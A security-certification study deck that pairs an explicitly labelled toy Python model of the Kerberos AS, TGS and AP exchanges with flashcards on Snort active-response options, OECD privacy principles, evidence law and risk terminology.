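As an added example covering the Kerberos components listed here and the Kerberos weakness noted earlier in the deck (not part of the original study set, and not real Kerberos code), the following Python models the three exchanges end to end: the AS exchange that returns a TGT and a session key, the TGS exchange that turns the TGT plus an authenticator into a service ticket, and the AP exchange in which the service validates the ticket with only its own key. Tickets are sealed with a toy encrypt-then-MAC construction (SHA-256 keystream plus HMAC-SHA256) standing in for Kerberos' real encryption types; the realm, principal names, password, and the 8-hour lifetime and 5-minute skew values are constructed assumptions.

```python
import hashlib, hmac, json, os, time

TICKET_LIFETIME = 8 * 3600   # seconds a ticket stays valid (assumed policy value)
CLOCK_SKEW = 300             # Kerberos tolerates about five minutes of clock skew on authenticators


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    """SHA-256 in counter mode as a keystream: a toy stand-in for Kerberos' real encryption types."""
    out, i = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
        i += 1
    return out[:n]


def seal(key: bytes, obj: dict) -> bytes:
    """Encrypt-then-MAC a JSON object: 16-byte nonce || ciphertext || 32-byte HMAC-SHA256 tag."""
    nonce, pt = os.urandom(16), json.dumps(obj).encode()
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def unseal(key: bytes, blob: bytes) -> dict:
    """Check the tag first: a wrong key or a tampered ticket raises before anything is decrypted."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("bad ticket or authenticator: wrong key or tampered")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))


def long_term_key(password: str, principal: str) -> bytes:
    """A principal's long-term key is derived from its password plus a salt (PBKDF2 stands in here)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), principal.encode(), 10_000)


def _fresh(auth: dict, ticket: dict) -> bool:
    """The authenticator must name the ticket's client and be recent, and the ticket must not have expired."""
    now = time.time()
    return auth["client"] == ticket["client"] and abs(now - auth["ts"]) <= CLOCK_SKEW and now <= ticket["exp"]


class KDC:
    """Authentication Service (AS) plus Ticket Granting Service (TGS) for one realm. It holds the
    long-term key of EVERY principal, which is the single point of failure the deck warns about."""

    def __init__(self, principals: dict):
        self.keys = dict(principals)           # principal name -> long-term key
        self.keys["krbtgt"] = os.urandom(32)   # the TGS's own key, which seals every TGT

    def as_exchange(self, client: str):
        """AS-REQ/AS-REP: a TGT sealed for the TGS, plus the session key sealed under the client's key."""
        session_key = os.urandom(32).hex()
        tgt = seal(self.keys["krbtgt"], {"client": client, "key": session_key, "exp": time.time() + TICKET_LIFETIME})
        return tgt, seal(self.keys[client], {"key": session_key})

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, service: str):
        """TGS-REQ/TGS-REP: validate the TGT and authenticator, then issue a ticket for the service."""
        t = unseal(self.keys["krbtgt"], tgt)
        if not _fresh(unseal(bytes.fromhex(t["key"]), authenticator), t):
            raise ValueError("authenticator does not match the TGT or is stale")
        svc_key = os.urandom(32).hex()
        ticket = seal(self.keys[service], {"client": t["client"], "key": svc_key, "exp": time.time() + TICKET_LIFETIME})
        return ticket, seal(bytes.fromhex(t["key"]), {"key": svc_key, "service": service})


class Service:
    def __init__(self, name: str, key: bytes):
        self.name, self.key = name, key

    def ap_exchange(self, ticket: bytes, authenticator: bytes) -> str:
        """AP-REQ: the service needs only its own key and never contacts the KDC."""
        t = unseal(self.key, ticket)
        if not _fresh(unseal(bytes.fromhex(t["key"]), authenticator), t):
            raise ValueError("bad or stale authenticator")
        return t["client"]


def login_and_access(kdc: KDC, service: Service, client: str, password: str) -> str:
    """Client side of all three exchanges; returns the principal name the service accepted."""
    k_client = long_term_key(password, client)
    tgt, enc = kdc.as_exchange(client)
    session_key = bytes.fromhex(unseal(k_client, enc)["key"])   # a wrong password fails right here
    ticket, enc2 = kdc.tgs_exchange(tgt, seal(session_key, {"client": client, "ts": time.time()}), service.name)
    svc_key = bytes.fromhex(unseal(session_key, enc2)["key"])
    return service.ap_exchange(ticket, seal(svc_key, {"client": client, "ts": time.time()}))


def login_ok(kdc: KDC, service: Service, client: str, password: str) -> bool:
    try:
        return login_and_access(kdc, service, client, password) == client
    except ValueError:
        return False


def build_realm():
    """Constructed realm: one user (alice, password 'correct horse') and one service (fileserver)."""
    fs_key = os.urandom(32)
    kdc = KDC({"alice": long_term_key("correct horse", "alice"), "fileserver": fs_key})
    return kdc, Service("fileserver", fs_key)


if __name__ == "__main__":
    kdc, fs = build_realm()
    print("right password:", login_ok(kdc, fs, "alice", "correct horse"))
    print("wrong password:", login_ok(kdc, fs, "alice", "wrong"))
    print("keys the KDC must protect:", sorted(kdc.keys))
```

Two points the model makes concrete: the password never crosses the wire (a wrong password simply fails to unseal the AS reply), and `kdc.keys` holds the key of every principal including the krbtgt key, so a compromised KDC can mint a ticket for anyone. The timestamped authenticator is why Kerberos deployments depend on synchronized clocks.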
Snort Active Response Rules
• Reset_dest: send TCP RST to destination • Reset_source: send TCP RST to source • Reset_both: send TCP RST to both the source and destination • Icmp_net: send ICMP network unreachable to source • Icmp_host: send ICMP host unreachable to source • Icmp_port: send ICMP port unreachable to source • Icmp_all: send ICMP network, host and port unreachable to source
Individual Participation Principle
1. Able to find out if an entity holds any of their personal info 2. Made aware of any personal information being held 3. Given a reason for any denials to account for personal data being held 4. Able to challenge the content of any personal data being held.
Best Evidence rule
Original documents are preferred over copies; conclusive, tangible objects are preferred over oral testimony.
Color of law
Acting under the guise of, or on behalf of, law enforcement, e.g., an information security professional acting under the color of law.
Computer as a Tool
Crimes where the computer is a central component enabling the commission of the crime, e.g., compromising a database server, or leveraging computers to steal cardholder data.
Burden of Proof
Criminal: beyond a reasonable doubt. Civil: preponderance of the evidence.
Copyright Act of 1976
Criteria to determine whether a use would be covered by the fair use doctrine: The purpose and style of excerpt, the nature of copyrighted work; the amount of conte
Evidence
Information Security Professionals should attempt to provide all evidence, regardless of whether that evidence proves or disproves the facts of the case.
***EXAM WARNING***
Keep all examples on the exam simple by determining whether they fall into the definition of a subject or an object.
Gross Negligence
Opposite of due care. Absence of due care. Legally important concept.
Collection Limitation Principle
Personal data collection should have limits; data should be obtained in a lawful manner and with the knowledge or consent of the data subject, unless there is a compelling reason to the contrary.
Data Quality Principle
Personal data should be complete, accurate, and maintained in a fashion consistent with the purposes for the data collection.
Authentication
Proving an identity claim. You authenticate the identity claim by supplying information or objects only you would possess, e.g., a driver's license or a password.
Risk
a matched threat and vulnerability
Safeguard
a measure taken to reduce risk
Threat
a potentially negative occurrence
Counterfeiting
attempting to pass off a product as if it were the original branded product.
Hearsay Evidence
constitutes second-hand evidence. As opposed to direct evidence, which someone has witnessed with her five senses, hearsay involves indirect information. It is generally inadmissible under Federal Rule of Evidence 802. Business and computer-generated records are generally considered hearsay, though the business records exception (Rule 803(6)) can admit records made in the regular course of business.
Privacy Act of 1974
created to codify protection of US citizens' data that is being used by the federal government. Act defined guidelines regarding how US citizens' PII would be used, collected, and distributed
Intellectual Property Law
law governing intangible property that resulted from a creative act. It controls the use of intangible property that can often be trivial to reproduce or abuse once made public or known.
Non-repudiation
means a user cannot deny (repudiate) having performed a transaction. It is the combination of authentication and integrity: non-repudiation authenticates the identity of the user and ensures the integrity of the transaction.
Least Privilege
means users should be granted the minimum amount of access (authorization) required to do their jobs, but no more.
Patent
provides a monopoly to the patent holder on the right to use, make, or sell an invention for a period of time, in exchange for the patent holder making the invention public.
Financial Damages: Compensatory
provide the victim with a financial award in effort to compensate for the loss or injury incurred as a direct result of the wrongdoing.
Due Care
provides a framework that helps to define minimum standard of protection that business stakeholders must attempt to achieve.
Corroborative Evidence
provides additional support for a fact that might have been called into question.
Financial Damages: Punitive
punish an individual or organization. Damages are typically awarded to attempt to discourage a particularly egregious violation where the compensatory and statutory damages alone would not act as a deterrent.
Copyright
represents a type of intellectual property that protects the form of expression in artistic, musical, or literary works, and is typically denoted by the © symbol. Its purpose is to preclude unauthorized duplication, distribution, and modification. In the US the term for an individual author's work is the life of the author plus 70 years.
Transborder Flows of Personal Data(1980)
OECD guidelines (1980) governing how a citizen's personal data may flow between companies based in different countries or regions; the privacy principles in this deck (collection limitation, data quality, purpose specification, openness, individual participation, accountability) come from them.
Authorization
the actions you can perform on a system once you have been identified and authenticated, e.g., reading, writing, or executing files or programs.
Total Cost of Ownership
the cost of a safeguard
Annualized Loss Expectancy(ALE)
the expected cost of loss due to a risk over a year; ALE = SLE × ARO (single loss expectancy times annualized rate of occurrence).
Accountability Principle
the entity using the personal data should be accountable for adhering to the principles above.
Openness Principle
the general policy concerning collection and use of personal data should be readily available
Civil Law
the most common of the major legal systems. judicial precedents and particular case rulings do not carry the weight they do under common law.
Purpose Specification Principle
the purpose for the data collection should be known, and the subsequent use of the data should be limited to the purposes outlined at the time of collection.